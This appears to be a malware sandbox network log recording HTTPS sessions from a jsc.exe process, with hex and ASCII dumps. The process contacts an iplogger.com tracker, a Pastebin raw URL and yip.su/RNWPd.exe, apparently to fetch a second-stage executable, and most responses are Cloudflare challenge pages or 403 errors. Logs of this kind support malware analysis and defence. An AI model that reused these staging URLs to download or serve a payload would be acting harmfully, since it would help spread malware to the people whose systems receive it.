                                    Data Ascii: 0X_GoxXeMIMelZJP3aKi4VBfQwNdlGFsJbhvRrFSDalNjEPL7H5Oxhfb5YROSNmVNIAgpFDInO7r2K0eiLIQb_kNrbsDtx_NrKrH4FeXxIm2wNTEIvT3tNI9ARZe6C.ldRpaAIGCHpZRnrD40MQk0kCWpmTZlzoT391jS6xYw.Y_6AuiFh8UNNtSVjn0jcS3isut2.0CkqOPdXmigokuaSgv1jD3cwM2SFO09wAWNKZbaSrTVKVvEoOPKP5ebQi


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    40192.168.2.549766104.21.76.574437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:05 UTC68OUTGET /1djqU4 HTTP/1.1
                                    Host: iplogger.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:06 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:06 UTC689INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 48 64 6e 54 31 64 4d 41 57 32 30 35 62 51 35 49 74 50 77 4e 4e 53 58 65 35 74 62 79 73 48 47 7a 56 55 5a 78 68 39 55 43 61 4b 51 56 58 51 72 44 5a 53 43 79 6c 57 4b 4d 45 51 65 58 33 33 43 47 52 4c 56 7a 39 5a 72 35 76 76 63 7a 6d 32 77 62 5a 50 47 42 54 6c 38 49 77 73 6b 78 79 4d 50 66 56 48 68 57 4b 53 38 32 57 4d 49 3d 24 36 4a 4c 59 71 76 76 70 58 5a 68 48 44 52 46 4f 6f 53 2b 72 76 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: HdnT1dMAW205bQ5ItPwNNSXe5tbysHGzVUZxh9UCaKQVXQrDZSCylWKMEQeX33CGRLVz9Zr5vvczm2wbZPGBTl8IwskxyMPfVHhWKS82WMI=$6JLYqvvpXZhHDRFOoS+rvg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:06 UTC1369INData Raw: 33 65 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e12<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:06 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:06 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:06 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:06 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:06 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:06 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:06 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 69 70 6c 6f 67 67 65 72 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 30 30 36 35 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 30 33 37 63 62 36 39 65 31 61 27 2c 63 48 61 73 68 3a 20 27 63 66 65 62 33 33 64 35 35 30 64 38 36 66 62 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 31 64 6a 71 55 34 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 65 48 6e 65 4d 54 46 34 35 65 51 36 62 2e 69 4a 65 79 56 78 50 54 48 71 35 67 35 4d 41 52 54 59 73 73 52 67 67 6a 55 31 77 4a 4d 2d 31 37 32 33 39 33 32 36 30 36 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "iplogger.com",cType: 'managed',cNounce: '90065',cRay: '8b4cfe037cb69e1a',cHash: 'cfeb33d550d86fb',cUPMDTk: "\/1djqU4?__cf_chl_tk=eHneMTF45eQ6b.iJeyVxPTHq5g5MARTYssRggjU1wJM-1723932606-0.0.1.1-4158",cFPWv: 'g',cT
                                    2024-08-17 22:10:06 UTC1369INData Raw: 49 4f 4a 6d 52 48 4f 62 7a 67 37 6e 75 68 66 78 56 4f 63 32 46 34 50 47 67 73 67 43 69 53 48 51 35 76 47 37 4d 75 30 44 55 79 57 63 6b 48 56 56 43 65 6e 6d 76 6d 57 41 48 75 79 35 47 79 54 48 48 62 2e 76 66 36 34 41 77 4d 77 68 6d 75 79 31 52 62 53 39 53 4b 34 2e 6e 78 78 5a 54 49 6e 49 2e 55 5f 77 63 66 39 42 2e 45 66 73 64 72 74 6c 56 5a 6c 34 47 37 4c 76 57 4c 50 34 50 58 30 4f 36 73 66 30 50 44 76 2e 39 6a 73 77 33 54 4c 45 41 77 75 53 53 52 42 51 54 78 39 69 47 50 75 45 56 55 31 4b 55 43 7a 45 7a 69 66 78 6f 44 48 6e 64 79 66 50 54 48 6d 65 64 62 47 4d 45 51 6d 67 55 42 38 48 58 35 31 49 5f 61 79 71 6f 76 39 30 6d 71 30 56 57 44 6e 33 47 69 38 54 69 70 46 54 72 44 74 36 67 49 67 56 6e 72 55 51 46 48 30 67 45 51 44 6d 4d 4b 34 76 33 58 6d 38 6e 65 68
                                    Data Ascii: IOJmRHObzg7nuhfxVOc2F4PGgsgCiSHQ5vG7Mu0DUyWckHVVCenmvmWAHuy5GyTHHb.vf64AwMwhmuy1RbS9SK4.nxxZTInI.U_wcf9B.EfsdrtlVZl4G7LvWLP4PX0O6sf0PDv.9jsw3TLEAwuSSRBQTx9iGPuEVU1KUCzEzifxoDHndyfPTHmedbGMEQmgUB8HX51I_ayqov90mq0VWDn3Gi8TipFTrDt6gIgVnrUQFH0gEQDmMK4v3Xm8neh


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    41192.168.2.549767104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:06 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:06 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfe08a97843fb-EWR
                                    2024-08-17 22:10:06 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:06 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:06 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:06 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    42192.168.2.549768188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:07 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:07 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:07 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 31 49 63 39 67 6b 44 5a 4a 36 67 30 33 46 4d 61 6d 35 64 51 44 43 30 66 59 63 5a 38 32 43 4e 2f 41 44 62 4d 6b 66 59 63 43 33 59 45 6d 71 70 5a 2f 31 50 5a 53 76 58 62 4e 68 58 67 74 2f 47 46 63 63 49 62 44 63 4b 79 65 33 36 31 53 4d 45 56 6d 78 2f 38 59 76 70 2f 37 55 47 62 50 4b 4d 5a 57 57 73 77 42 4b 77 45 45 32 59 3d 24 4b 43 2f 79 4f 32 45 4e 58 68 6f 4c 6a 45 37 58 42 68 37 4f 6b 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: 1Ic9gkDZJ6g03FMam5dQDC0fYcZ82CN/ADbMkfYcC3YEmqpZ/1PZSvXbNhXgt/GFccIbDcKye361SMEVmx/8Yvp/7UGbPKMZWWswBKwEE2Y=$KC/yO2ENXhoLjE7XBh7Okw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
